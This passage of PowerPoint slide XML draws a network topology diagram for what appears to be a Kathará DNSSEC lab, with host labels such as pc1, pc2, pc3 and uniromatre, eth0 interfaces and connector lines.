          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2325716" y="6326233"/>
            <a:ext cx="904078" cy="79994"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="5F5F5F"/>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endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Connettore diritto 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0126FC1-A479-273B-F92E-984D1E37B4C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3229794" y="6156631"/>
            <a:ext cx="1810441"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Connettore diritto 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94EB5B50-5E0D-13A3-288D-97A531C3411A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1917704" y="5790799"/>
            <a:ext cx="1310271"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9327" name="Line 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDC8E626-7740-10D4-71F5-87645BB93067}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1348638" y="3095873"/>
            <a:ext cx="7415" cy="505625"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="5F5F5F"/>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endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9305" name="Connettore diritto 9304">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89B68C27-8F94-D991-9C69-FB108277C63D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="9287" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6764107" y="1822409"/>
            <a:ext cx="20032" cy="647488"/>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9298" name="Line 151">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFA82E5F-5C2A-7C8F-F74B-2C7C74256ED1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1476375" y="3033869"/>
            <a:ext cx="3526369" cy="2659"/>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endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9297" name="Line 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B5D78D0-7280-6D3C-4543-1F47BE96C2F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3799212" y="3881170"/>
            <a:ext cx="1286124" cy="6713"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="5F5F5F"/>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endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="55" name="Connettore diritto 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C00C7AD2-F1B7-5C79-238E-061D2A6FC252}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5217619" y="5309001"/>
            <a:ext cx="7414" cy="615427"/>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50" name="Line 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B933CFF-6CE1-CB42-02E8-1D725F2B5904}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="7403649" y="1891613"/>
            <a:ext cx="20032" cy="460633"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="5F5F5F"/>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endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="39" name="Connettore diritto 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71353247-6AF6-42A5-0537-0D97F7067533}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="32" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5691343" y="1822409"/>
            <a:ext cx="5866" cy="635826"/>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Connettore diritto 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B6FD768-5E8C-E9DD-0C2A-799FF239F9BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="7" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4763186" y="1841489"/>
            <a:ext cx="0" cy="60239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Connettore diritto 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCCD692D-6598-410B-C4F7-CF47C72FD067}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="4" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3821141" y="1834146"/>
            <a:ext cx="0" cy="599215"/>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9220" name="Rectangle 145">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F9653AB-8A72-CE2E-1643-9A3577F8C142}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>network topology</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16E85ABE-27B2-4AB8-6A3F-C0EEB856B4F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27E24BD5-4DB3-BA4C-7260-F3E7A57A4540}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 104">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{930B13E1-161B-1321-C0B4-78C102D2A02B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3532746" y="1220690"/>
            <a:ext cx="576790" cy="613456"/>
            <a:chOff x="1429" y="1064"/>
            <a:chExt cx="818" cy="870"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3" name="Picture 105">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E774EAE-5225-EEED-3973-C1F42695311E}"/>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52" y="1064"/>
              <a:ext cx="573"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 Box 106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C079E84E-D51C-364A-40FC-EBF49AC58C85}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1429" y="1582"/>
              <a:ext cx="818" cy="352"/>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50000"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
                <a:t>pc1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 104">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3567802B-53B5-1411-78F1-BC46D7F28C27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4474791" y="1228033"/>
            <a:ext cx="576790" cy="613456"/>
            <a:chOff x="1429" y="1064"/>
            <a:chExt cx="818" cy="870"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 105">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F1CE0DB-9F4D-D9B7-392F-76DFF0C89BEF}"/>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52" y="1064"/>
              <a:ext cx="573"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 Box 106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE901778-42A8-1A75-CB37-FC302FF0EF56}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1429" y="1582"/>
              <a:ext cx="818" cy="352"/>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50000"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
                <a:t>pc2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 104">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E6462C3-1DDF-1AC0-8251-D0616D25277B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1518965" y="5559356"/>
            <a:ext cx="576790" cy="613456"/>
            <a:chOff x="1429" y="1064"/>
            <a:chExt cx="818" cy="870"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Picture 105">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCBCE41A-0ABC-6C7E-EC87-742280A3F07B}"/>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52" y="1064"/>
              <a:ext cx="573"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Text Box 106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA900990-7F7A-3C5A-8A0E-ECBCD0F110B3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1429" y="1582"/>
              <a:ext cx="818" cy="352"/>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50000"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
                <a:t>pc3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Line 151">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AFD209A-7D61-3E78-E951-E11F3BE3D016}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3440447" y="2446573"/>
            <a:ext cx="3852857" cy="23324"/>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endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Oval 152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAEA2E0C-F34E-95B7-19C0-E4927FC37F80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7293304" y="2363536"/>
            <a:ext cx="220690" cy="220690"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>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it-IT" altLang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFB7F855-38F6-04FF-4725-637F9D601A9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3657018" y="1972871"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B736F1EF-FD3F-7252-441D-C685EA1DCB43}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DED026C9-1C48-DB9F-B34A-455EE4E0E2D6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7395CAAE-155D-F337-7E43-C925BE480B47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4597668" y="1958829"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE6DE43E-5662-600C-FBC6-442C3994A450}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85054BD5-F142-36C1-3550-74D1B420C044}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31" name="Gruppo 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A480030-472D-96B8-1E2B-EDB3BCD21DC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5243610" y="1227608"/>
            <a:ext cx="907197" cy="594801"/>
            <a:chOff x="10432210" y="4306849"/>
            <a:chExt cx="907197" cy="594801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Text Box 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31B71DB6-DDDF-D3A1-9543-66602D6BA07B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10432210" y="4653248"/>
              <a:ext cx="907197" cy="248402"/>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50000"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0" err="1"/>
                <a:t>uniromatre</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="AutoShape 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAF4592D-3540-506C-0703-C1AC106E4CE9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10691757" y="4306849"/>
              <a:ext cx="378624" cy="350441"/>
            </a:xfrm>
            <a:prstGeom prst="cube">
              <a:avLst>
                <a:gd name="adj" fmla="val 15116"/>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endParaRPr lang="it-IT" altLang="it-IT" sz="1800">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="mainfrm">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5779AFEF-B15D-F09E-D1EC-68A9756CC85C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10691757" y="4360763"/>
              <a:ext cx="324710" cy="296527"/>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 name="T24" fmla="*/ 326 w 21600"/>
                <a:gd name="T25" fmla="*/ 22180 h 21600"/>
